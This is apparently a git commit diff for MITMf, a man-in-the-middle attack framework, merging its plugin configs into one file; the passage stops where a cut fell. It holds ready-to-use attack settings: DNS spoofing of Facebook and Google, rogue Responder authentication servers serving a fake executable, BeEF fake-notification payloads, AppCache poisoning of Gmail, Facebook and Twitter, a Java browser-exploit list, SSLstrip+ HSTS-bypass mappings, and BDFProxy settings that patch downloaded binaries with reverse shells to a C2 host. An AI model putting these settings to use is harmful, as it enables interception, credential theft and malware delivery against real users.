- All config files now consolidated into a single file
- Added 'args' option in config file
- HSTS bypass is now a plugin (SSLstrip+)
- SMBAuth now defaults to specified interface IP if --host is not passed
- Modified plugins for new config support
- Changed appoison and responder plugin for ConfigObj library support
- Minor visual argparse changes
- Slapped santa on the head with a trout
- Gave rudolf a new nose
parent
f359ee7cdd
commit
846f85426c
24 changed files with 531 additions and 436 deletions
|
@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p
|
||||||
|
|
||||||
Availible plugins:
|
Availible plugins:
|
||||||
- Responder - LLMNR, NBT-NS and MDNS poisoner
|
- Responder - LLMNR, NBT-NS and MDNS poisoner
|
||||||
|
- SSLstrip+ - Partially bypass HSTS
|
||||||
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
|
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
|
||||||
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
|
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
|
||||||
- AppCachePoison - Perform app cache poison attacks
|
- AppCachePoison - Perform app cache poison attacks
|
||||||
|
|
|
@ -1,53 +0,0 @@
|
||||||
[DEFAULT]
|
|
||||||
; HTML5 AppCache poisioning attack
|
|
||||||
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
|
|
||||||
; generic settings for tampering engine
|
|
||||||
|
|
||||||
templates_path=config/app_cache_poison_templates
|
|
||||||
;enable_only_in_useragents=Chrome|Firefox
|
|
||||||
|
|
||||||
; when visiting first url matching following expression we will embed iframes with all tamper URLs
|
|
||||||
;(to poison the cache for all of them all at once)
|
|
||||||
mass_poison_url_match=http://.*prezydent\.pl.*
|
|
||||||
; it's only useful to mass poison chrome because:
|
|
||||||
; - it supports iframe sandbox preventing framebusting
|
|
||||||
; - does not ask for confirmation
|
|
||||||
mass_poison_useragent_match=Chrome|Safari
|
|
||||||
|
|
||||||
[test]
|
|
||||||
; any //example.com URL redirects to iana and will display our spoofed content
|
|
||||||
tamper_url=http://example.com/
|
|
||||||
manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
|
|
||||||
templates=test ; which templates to use for spoofing content?
|
|
||||||
skip_in_mass_poison=1
|
|
||||||
|
|
||||||
; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
|
|
||||||
[gmail]
|
|
||||||
tamper_url=http://mail.google.com/mail/
|
|
||||||
; manifest has to be of last domain in redirect loop
|
|
||||||
manifest_url=http://mail.google.com/robots.txt
|
|
||||||
templates=default ; could be omitted
|
|
||||||
|
|
||||||
[facebook]
|
|
||||||
tamper_url=http://www.facebook.com/
|
|
||||||
manifest_url=http://www.facebook.com/robots.txt
|
|
||||||
templates=facebook ; use different template
|
|
||||||
|
|
||||||
[twitter]
|
|
||||||
tamper_url=http://twitter.com/
|
|
||||||
;tamper_url_match=^http://(www\.)?twitter\.com/$
|
|
||||||
manifest_url=http://twitter.com/robots.txt
|
|
||||||
|
|
||||||
[testing]
|
|
||||||
tamper_url=http://www.html5rocks.com/en/
|
|
||||||
manifest_url=http://www.html5rocks.com/robots.txt
|
|
||||||
|
|
||||||
; we can also modify non-HTML URLs to append malicious code to them
|
|
||||||
; but for them to be cached in HTML5 AppCache they need to be referred in
|
|
||||||
; manifest for a poisoned domain
|
|
||||||
; if not, they are "only" cached for 10 years :D
|
|
||||||
[ga]
|
|
||||||
raw_url=http://www.google-analytics.com/ga.js
|
|
||||||
templates=script
|
|
||||||
skip_in_mass_poison=1
|
|
||||||
;you can add other scripts in additional sections like jQuery etc.
|
|
|
@ -1,32 +0,0 @@
|
||||||
#Example config file for the BeefAutorun plugin
|
|
||||||
|
|
||||||
mode = oneshot
|
|
||||||
#can be set to loop, or oneshot
|
|
||||||
|
|
||||||
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
|
|
||||||
#in oneshot mode the plugin will run modules only once per hooked browser
|
|
||||||
|
|
||||||
[ALL] #Runs specified modules on all hooked browsers
|
|
||||||
|
|
||||||
'Man-In-The-Browser'= '{}'
|
|
||||||
|
|
||||||
|
|
||||||
[targets] #Runs specified modules based on OS and Browser type
|
|
||||||
|
|
||||||
[[Windows]] #Target all Windows versions using Firefox and Internet Explorer
|
|
||||||
|
|
||||||
[[[FF]]]
|
|
||||||
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
|
|
||||||
|
|
||||||
[[[IE]]]
|
|
||||||
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
|
|
||||||
|
|
||||||
[[Windows 7]] #Target only Windows 7 using Chrome
|
|
||||||
|
|
||||||
[[[C]]]
|
|
||||||
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
|
|
||||||
|
|
||||||
[[Linux]] #Target Linux platforms using Chrome
|
|
||||||
|
|
||||||
[[[C]]]
|
|
||||||
'Redirect Browser (Rickroll)' = '{}'
|
|
|
@ -1,4 +0,0 @@
|
||||||
#Example config file for DHCP spoofing
|
|
||||||
ip_pool = 192.168.2.10-50
|
|
||||||
subnet = 255.255.255.0
|
|
||||||
dns_server = 192.168.2.20 #optional
|
|
|
@ -1,3 +0,0 @@
|
||||||
#Example config file for DNS tampering
|
|
||||||
www.facebook.com = 192.168.10.1
|
|
||||||
google.com = 192.168.10.1
|
|
|
@ -1,122 +0,0 @@
|
||||||
"""
|
|
||||||
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
|
||||||
|
|
||||||
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
|
||||||
|
|
||||||
Copyright (c) 2013-2014, Joshua Pitts
|
|
||||||
All rights reserved.
|
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification,
|
|
||||||
are permitted provided that the following conditions are met:
|
|
||||||
|
|
||||||
1. Redistributions of source code must retain the above copyright notice,
|
|
||||||
this list of conditions and the following disclaimer.
|
|
||||||
|
|
||||||
2. Redistributions in binary form must reproduce the above copyright notice,
|
|
||||||
this list of conditions and the following disclaimer in the documentation
|
|
||||||
and/or other materials provided with the distribution.
|
|
||||||
|
|
||||||
3. Neither the name of the copyright holder nor the names of its contributors
|
|
||||||
may be used to endorse or promote products derived from this software without
|
|
||||||
specific prior written permission.
|
|
||||||
|
|
||||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
||||||
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
||||||
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
||||||
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
|
||||||
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
|
||||||
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
|
||||||
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
|
||||||
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
|
||||||
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
|
|
||||||
Tested on Kali-Linux.
|
|
||||||
|
|
||||||
"""
|
|
||||||
|
|
||||||
[ZIP]
|
|
||||||
# patchCount is the max number of files to patch in a zip file
|
|
||||||
# After the max is reached it will bypass the rest of the files
|
|
||||||
# and send on it's way
|
|
||||||
|
|
||||||
patchCount = 5
|
|
||||||
|
|
||||||
# In Bytes
|
|
||||||
maxSize = 40000000
|
|
||||||
|
|
||||||
blacklist = .dll, #don't do dlls in a zip file
|
|
||||||
|
|
||||||
[TAR]
|
|
||||||
# patchCount is the max number of files to patch in a tar file
|
|
||||||
# After the max is reached it will bypass the rest of the files
|
|
||||||
# and send on it's way
|
|
||||||
|
|
||||||
patchCount = 5
|
|
||||||
|
|
||||||
# In Bytes
|
|
||||||
maxSize = 40000000
|
|
||||||
|
|
||||||
blacklist = , # a comma is null do not leave blank
|
|
||||||
|
|
||||||
[targets]
|
|
||||||
#MAKE SURE that your settings for host and port DO NOT
|
|
||||||
# overlap between different types of payloads
|
|
||||||
|
|
||||||
[[ALL]] # DEFAULT settings for all targets REQUIRED
|
|
||||||
|
|
||||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
|
||||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
|
||||||
FatPriority = x64 # choices: x86 or x64
|
|
||||||
|
|
||||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
|
||||||
|
|
||||||
CompressedFiles = True #True/False
|
|
||||||
[[[LinuxIntelx86]]]
|
|
||||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
|
||||||
HOST = 192.168.1.168 # The C2
|
|
||||||
PORT = 8888
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
|
||||||
|
|
||||||
[[[LinuxIntelx64]]]
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 9999
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[WindowsIntelx86]]]
|
|
||||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 8443
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
ZERO_CERT = False
|
|
||||||
PATCH_DLL = True
|
|
||||||
MSFPAYLOAD = windows/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[WindowsIntelx64]]]
|
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 8088
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
|
||||||
ZERO_CERT = True
|
|
||||||
PATCH_DLL = False
|
|
||||||
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[MachoIntelx86]]]
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 4444
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[MachoIntelx64]]]
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 5555
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
|
@ -1,11 +0,0 @@
|
||||||
#here you can configure your domains to bypass HSTS on
|
|
||||||
#the format is real.domain.com = fake.domain.com
|
|
||||||
|
|
||||||
#for google and gmail
|
|
||||||
accounts.google.com = account.google.com
|
|
||||||
mail.google.com = gmail.google.com
|
|
||||||
accounts.google.se = cuentas.google.se
|
|
||||||
|
|
||||||
#for facebook
|
|
||||||
www.facebook.com = social.facebook.com
|
|
||||||
facebook.com = social.facebook.com
|
|
|
@ -1,27 +0,0 @@
|
||||||
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
|
||||||
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
|
||||||
|
|
||||||
[Multi] #Cross platform exploits, yay java! <3
|
|
||||||
|
|
||||||
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
|
|
||||||
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
|
|
||||||
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
|
|
||||||
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
|
|
||||||
multi/browser/java_jre17_exec = 1.7.0.6
|
|
||||||
multi/browser/java_jre17_jaxws = 1.7.0.7
|
|
||||||
multi/browser/java_jre17_jmxbean = 1.7.0.10
|
|
||||||
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
|
|
||||||
multi/browser/java_jre17_reflection_types = 1.7.0.17
|
|
||||||
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
|
|
||||||
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
|
|
||||||
multi/browser/java_jre17_method_handle = 1.7.0.7
|
|
||||||
multi/browser/java_jre17_driver_manager = 1.7.0.17
|
|
||||||
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
|
|
||||||
multi/browser/java_storeimagearray = 1.7.0.21
|
|
||||||
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
|
|
||||||
|
|
||||||
[Windows] #These are windows specific
|
|
||||||
|
|
||||||
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
|
|
||||||
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
|
|
||||||
windows/browser/java_mixer_sequencer = 1.6.0.18
|
|
363
config/mitmf.cfg
363
config/mitmf.cfg
|
@ -1,10 +1,355 @@
|
||||||
[BeEF]
|
#MITMf configuration
|
||||||
beefip = 127.0.0.1
|
|
||||||
beefport = 3000
|
|
||||||
user = beef
|
|
||||||
pass = beef
|
|
||||||
|
|
||||||
[Metasploit]
|
[MITMf]
|
||||||
msfport = 8080 #Port to start webserver for exploits
|
|
||||||
rpcip = 127.0.0.1
|
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
|
||||||
rpcpass = abc123
|
args=''
|
||||||
|
|
||||||
|
#Required BeEF and Metasploit options
|
||||||
|
[[BeEF]]
|
||||||
|
beefip = 127.0.0.1
|
||||||
|
beefport = 3000
|
||||||
|
user = beef
|
||||||
|
pass = beef
|
||||||
|
|
||||||
|
[[Metasploit]]
|
||||||
|
msfport = 8080 #Port to start webserver for exploits
|
||||||
|
rpcip = 127.0.0.1
|
||||||
|
rpcpass = abc123
|
||||||
|
|
||||||
|
#-----------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
#Plugin configuration starts here
|
||||||
|
|
||||||
|
[Spoof]
|
||||||
|
|
||||||
|
[[DHCP]]
|
||||||
|
ip_pool = 192.168.2.10-50
|
||||||
|
subnet = 255.255.255.0
|
||||||
|
dns_server = 192.168.2.20 #optional
|
||||||
|
|
||||||
|
[[DNS]]
|
||||||
|
www.facebook.com = 192.168.10.1
|
||||||
|
google.com = 192.168.10.1
|
||||||
|
|
||||||
|
|
||||||
|
[Responder]
|
||||||
|
|
||||||
|
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
||||||
|
SQL = On
|
||||||
|
SMB = On
|
||||||
|
Kerberos = On
|
||||||
|
FTP = On
|
||||||
|
POP = On
|
||||||
|
##Listen on 25/TCP, 587/TCP
|
||||||
|
SMTP = On
|
||||||
|
IMAP = On
|
||||||
|
HTTP = On
|
||||||
|
HTTPS = On
|
||||||
|
DNS = On
|
||||||
|
LDAP = On
|
||||||
|
|
||||||
|
#Set a custom challenge
|
||||||
|
Challenge = 1122334455667788
|
||||||
|
|
||||||
|
#Set this to change the default logging file
|
||||||
|
SessionLog = Responder-Session.log
|
||||||
|
|
||||||
|
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
RespondTo =
|
||||||
|
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
|
||||||
|
#RespondTo = WPAD,DEV,PROD,SQLINT
|
||||||
|
RespondToName =
|
||||||
|
|
||||||
|
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
DontRespondTo =
|
||||||
|
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
|
||||||
|
DontRespondToName =
|
||||||
|
|
||||||
|
[[HTTP Server]]
|
||||||
|
|
||||||
|
#Set this to On if you want to always serve a specific file to the victim.
|
||||||
|
Serve-Always = Off
|
||||||
|
|
||||||
|
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
|
||||||
|
Serve-Exe = Off
|
||||||
|
|
||||||
|
#Uncomment and specify a custom file to serve, the file must exist.
|
||||||
|
Filename = config/responder/Denied.html
|
||||||
|
|
||||||
|
#Specify a custom executable file to serve, the file must exist.
|
||||||
|
ExecFilename = config/responder/FixInternet.exe
|
||||||
|
|
||||||
|
#Set your custom PAC script
|
||||||
|
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
|
||||||
|
|
||||||
|
[[HTTPS Server]]
|
||||||
|
|
||||||
|
#Change to use your certs
|
||||||
|
cert = config/responder/certs/responder.crt
|
||||||
|
key = config/responder/certs/responder.key
|
||||||
|
|
||||||
|
|
||||||
|
[BeEFAutorun]
|
||||||
|
#Example config for the BeefAutorun plugin
|
||||||
|
|
||||||
|
mode = oneshot
|
||||||
|
#can be set to loop, or oneshot
|
||||||
|
|
||||||
|
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
|
||||||
|
#in oneshot mode the plugin will run modules only once per hooked browser
|
||||||
|
|
||||||
|
[[ALL]] #Runs specified modules on all hooked browsers
|
||||||
|
|
||||||
|
'Man-In-The-Browser'= '{}'
|
||||||
|
|
||||||
|
[[targets]] #Runs specified modules based on OS and Browser type
|
||||||
|
|
||||||
|
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
|
||||||
|
|
||||||
|
[[[[FF]]]]
|
||||||
|
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
|
||||||
|
|
||||||
|
[[[[IE]]]]
|
||||||
|
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
|
||||||
|
|
||||||
|
[[[Windows 7]]] #Target only Windows 7 using Chrome
|
||||||
|
|
||||||
|
[[[[C]]]]
|
||||||
|
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
|
||||||
|
|
||||||
|
[[[Linux]]] #Target Linux platforms using Chrome
|
||||||
|
|
||||||
|
[[[[C]]]]
|
||||||
|
'Redirect Browser (Rickroll)' = '{}'
|
||||||
|
|
||||||
|
[AppCachePoison]
|
||||||
|
# HTML5 AppCache poisioning attack
|
||||||
|
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
|
||||||
|
# generic settings for tampering engine
|
||||||
|
|
||||||
|
#enable_only_in_useragents=Chrome|Firefox
|
||||||
|
|
||||||
|
templates_path=config/app_cache_poison_templates
|
||||||
|
|
||||||
|
# when visiting first url matching following expression we will embed iframes with all tamper URLs
|
||||||
|
#(to poison the cache for all of them all at once)
|
||||||
|
|
||||||
|
mass_poison_url_match=http://.*prezydent\.pl.*
|
||||||
|
|
||||||
|
# it's only useful to mass poison chrome because:
|
||||||
|
# - it supports iframe sandbox preventing framebusting
|
||||||
|
# - does not ask for confirmation
|
||||||
|
|
||||||
|
mass_poison_useragent_match=Chrome|Safari
|
||||||
|
|
||||||
|
[[test]]
|
||||||
|
# any //example.com URL redirects to iana and will display our spoofed content
|
||||||
|
|
||||||
|
tamper_url=http://example.com/
|
||||||
|
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
|
||||||
|
templates=test # which templates to use for spoofing content?
|
||||||
|
skip_in_mass_poison=1
|
||||||
|
|
||||||
|
[[gmail]]
|
||||||
|
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
|
||||||
|
|
||||||
|
tamper_url=http://mail.google.com/mail/
|
||||||
|
|
||||||
|
# manifest has to be of last domain in redirect loop
|
||||||
|
|
||||||
|
manifest_url=http://mail.google.com/robots.txt
|
||||||
|
templates=default # could be omitted
|
||||||
|
|
||||||
|
[[facebook]]
|
||||||
|
tamper_url=http://www.facebook.com/
|
||||||
|
manifest_url=http://www.facebook.com/robots.txt
|
||||||
|
templates=facebook # use different template
|
||||||
|
|
||||||
|
[[twitter]]
|
||||||
|
tamper_url=http://twitter.com/
|
||||||
|
#tamper_url_match=^http://(www\.)?twitter\.com/$
|
||||||
|
manifest_url=http://twitter.com/robots.txt
|
||||||
|
|
||||||
|
[[testing]]
|
||||||
|
tamper_url=http://www.html5rocks.com/en/
|
||||||
|
manifest_url=http://www.html5rocks.com/robots.txt
|
||||||
|
|
||||||
|
[[ga]]
|
||||||
|
# we can also modify non-HTML URLs to append malicious code to them
|
||||||
|
# but for them to be cached in HTML5 AppCache they need to be referred in
|
||||||
|
# manifest for a poisoned domain
|
||||||
|
# if not, they are "only" cached for 10 years :D
|
||||||
|
|
||||||
|
raw_url=http://www.google-analytics.com/ga.js
|
||||||
|
templates=script
|
||||||
|
skip_in_mass_poison=1
|
||||||
|
#you can add other scripts in additional sections like jQuery etc.
|
||||||
|
|
||||||
|
[JavaPwn]
|
||||||
|
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
||||||
|
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
||||||
|
|
||||||
|
[[Multi]] #Cross platform exploits, yay java! <3
|
||||||
|
|
||||||
|
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
|
||||||
|
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
|
||||||
|
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
|
||||||
|
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
|
||||||
|
multi/browser/java_jre17_exec = 1.7.0.6
|
||||||
|
multi/browser/java_jre17_jaxws = 1.7.0.7
|
||||||
|
multi/browser/java_jre17_jmxbean = 1.7.0.10
|
||||||
|
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
|
||||||
|
multi/browser/java_jre17_reflection_types = 1.7.0.17
|
||||||
|
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
|
||||||
|
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
|
||||||
|
multi/browser/java_jre17_method_handle = 1.7.0.7
|
||||||
|
multi/browser/java_jre17_driver_manager = 1.7.0.17
|
||||||
|
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
|
||||||
|
multi/browser/java_storeimagearray = 1.7.0.21
|
||||||
|
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
|
||||||
|
|
||||||
|
[[Windows]] #These are windows specific
|
||||||
|
|
||||||
|
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
|
||||||
|
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
|
||||||
|
windows/browser/java_mixer_sequencer = 1.6.0.18
|
||||||
|
|
||||||
|
[SSLstrip+]
|
||||||
|
#here you can configure your domains to bypass HSTS on
|
||||||
|
#the format is real.domain.com = fake.domain.com
|
||||||
|
|
||||||
|
#for google and gmail
|
||||||
|
accounts.google.com = account.google.com
|
||||||
|
mail.google.com = gmail.google.com
|
||||||
|
accounts.google.se = cuentas.google.se
|
||||||
|
|
||||||
|
#for facebook
|
||||||
|
www.facebook.com = social.facebook.com
|
||||||
|
facebook.com = social.facebook.com
|
||||||
|
|
||||||
|
#-----------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
#
|
||||||
|
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
#
|
||||||
|
# Copyright (c) 2013-2014, Joshua Pitts
|
||||||
|
# All rights reserved.
|
||||||
|
#
|
||||||
|
# Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
# are permitted provided that the following conditions are met:
|
||||||
|
#
|
||||||
|
# 1. Redistributions of source code must retain the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer.
|
||||||
|
#
|
||||||
|
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer in the documentation
|
||||||
|
# and/or other materials provided with the distribution.
|
||||||
|
#
|
||||||
|
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
|
# may be used to endorse or promote products derived from this software without
|
||||||
|
# specific prior written permission.
|
||||||
|
#
|
||||||
|
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
|
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
|
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
# POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
#
|
||||||
|
# Tested on Kali-Linux.
|
||||||
|
|
||||||
|
#-----------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
[FilePwn]
|
||||||
|
[[ZIP]]
|
||||||
|
# patchCount is the max number of files to patch in a zip file
|
||||||
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
# and send on it's way
|
||||||
|
|
||||||
|
patchCount = 5
|
||||||
|
|
||||||
|
# In Bytes
|
||||||
|
maxSize = 40000000
|
||||||
|
|
||||||
|
blacklist = .dll, #don't do dlls in a zip file
|
||||||
|
|
||||||
|
[[TAR]]
|
||||||
|
# patchCount is the max number of files to patch in a tar file
|
||||||
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
# and send on it's way
|
||||||
|
|
||||||
|
patchCount = 5
|
||||||
|
|
||||||
|
# In Bytes
|
||||||
|
maxSize = 40000000
|
||||||
|
|
||||||
|
blacklist = , # a comma is null do not leave blank
|
||||||
|
|
||||||
|
[[targets]]
|
||||||
|
#MAKE SURE that your settings for host and port DO NOT
|
||||||
|
# overlap between different types of payloads
|
||||||
|
|
||||||
|
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
||||||
|
|
||||||
|
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||||
|
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||||
|
FatPriority = x64 # choices: x86 or x64
|
||||||
|
|
||||||
|
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||||
|
|
||||||
|
CompressedFiles = True #True/False
|
||||||
|
[[[[LinuxIntelx86]]]]
|
||||||
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||||
|
HOST = 192.168.1.168 # The C2
|
||||||
|
PORT = 8888
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||||
|
|
||||||
|
[[[[LinuxIntelx64]]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 9999
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[WindowsIntelx86]]]]
|
||||||
|
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 8443
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
ZERO_CERT = False
|
||||||
|
PATCH_DLL = True
|
||||||
|
MSFPAYLOAD = windows/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[WindowsIntelx64]]]]
|
||||||
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 8088
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
||||||
|
